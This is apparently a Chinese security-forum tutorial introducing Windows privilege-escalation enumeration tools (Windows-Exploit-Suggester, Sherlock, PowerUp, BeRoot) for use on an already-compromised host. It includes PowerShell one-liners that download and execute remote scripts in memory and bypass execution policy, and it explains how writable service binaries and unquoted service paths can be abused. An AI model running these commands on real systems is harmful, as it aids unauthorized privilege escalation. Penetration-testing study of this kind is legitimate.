大家好,我是Alex。今天给大家介绍几个工具方便在windows下提升权限。
Windows-Exploit-Suggester
Windows-Exploit-Suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester
它需要从Windows主机输出“systeminfo”命令,以便比较Microsoft安全公告数据库并确定主机的补丁级别。
安装依赖关系python-xlrd,$ pip install xlrd –upgrade
![图片[1]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223050yfxcdlxju6bdc8qh.png)
![图片[1]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223050yfxcdlxju6bdc8qh.png)
使用–update从Microsoft自动下载安全公告数据库,并将其另存为Excel电子表格。
![图片[2]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223051px0vqf7dvva05m42.png)
在靶机被攻陷后,使用systeminfo命令查看系统详情,并写入txt文件
![]()
使用命令./windows-exploit-suggester.py –database 2017-04-26-mssb.xls–systeminfo systeminfo.txt来比对结果,
部分截图如下
![图片[4]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223111x88bj741414j17jl.png)
![图片[4]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223111x88bj741414j17jl.png)
也可使用命令./windows-exploit-suggester.py –database2014-06-06-mssb.xlsx –ostext ‘windows server 2008 r2’来获取所有windows server 2008 r2所有公开漏洞
![图片[5]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223123e0lvv2rg3j4wpf28.png)
-h 可以查看帮助。
Sherlock
https://github.com/rasta-mouse/Sherlock
打开powershell 远程加载脚本
IEX(New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1’)
![图片[6]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223131yf5k578eyg2f55hz.png)
![图片[6]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223131yf5k578eyg2f55hz.png)
也可本地加载脚本 Import-ModuleSherlock.ps1
使用命令Find-AllVulns查看漏洞版本
![图片[7]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223140eqrac5yae5apszqy.png)
显示Appears Vulnerable为可用漏洞。
使用Get-Architecture获取CPU架构
![图片[8]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223148wxzq1wxhn0gqw17x.png)
使用Get-FileVersionInfo查看软件版本信息
![图片[9]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223154otnq9zsrdxkryrnm.png)
PowerUp
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
“系统服务错误权限配置漏洞”简介
Windows系统服务文件在操作系统启动时会加载执行,并且在后台调用可执行文件。比如,JAVA升级程序,每次重启系统时,JAVA升级程序会检测Oracle网站,是否有新版JAVA程序。而类似JAVA程序之类的系统服务程序加载时往往都是运行在系统权限上的。所以如果一个低权限的用户对于此类系统服务调用的可执行文件具有可写的权限,那么就可以将其替换成我们的恶意可执行文件,从而随着系统启动服务而获得系统权限。
上传脚本后,在CMD下执行命令在内存中加载脚本,
powershell -nop-exec bypass -c “IEX (New-ObjectNet.WebClient).DownloadString(‘c:/PowerUp.ps1’);Invoke-AllChecks”
或本地隐藏权限绕过执行
powershell.exe-exec bypass -Command “& {Import-Module .\PowerUp.ps1;Invoke-AllChecks}”
第一条不成功便执行第二条。
补充:
-NoProfile(-NoP):PowerShell控制台不加载当前用户的配置
-Exec Bypass:绕过执行安全策略
Import-Module:加载脚本
-Exec Bypass:绕过执行安全策略
Import-Module:加载脚本
部分截图
![图片[10]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223203eoi950v0f309x0y5.png)
我们可以使用icacls来验证下PowerUp脚本检测的结果
![图片[11]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223217quqrs81slq15r6f3.png)
Github上有详细的用法参数,不再细说。
![图片[12]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223229sc6jjwdl535atrv1.png)
BeRoot
https://github.com/AlessandroZ/BeRoot
“TrustedService Paths”漏洞是由系统中的“CreateProcess”函数引起的,利用了windows文件路径解析的特性,并涉及了服务路径的文件/文件夹权限,存在缺陷的服务程序利用了属于可执行文件的文件/文件夹权限。如果权限合适,我们可以上传恶意可执行文件。简单讲就是查找系统服务文件中存在非引用路径。如果一个服务调用可执行文件,没有正确处理引用的全路径名,就可以利用这个漏洞。
![图片[13]-Windows提权工具介绍](https://bbs.77169.com/data/attachment/forum/201704/26/223241skunaqfkzkrtdkuq.png)
工具只能用来检测,无法直接利用目标系统中存在的漏洞
可以参考链接:http://www.freebuf.com/sectool/132806.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END














暂无评论内容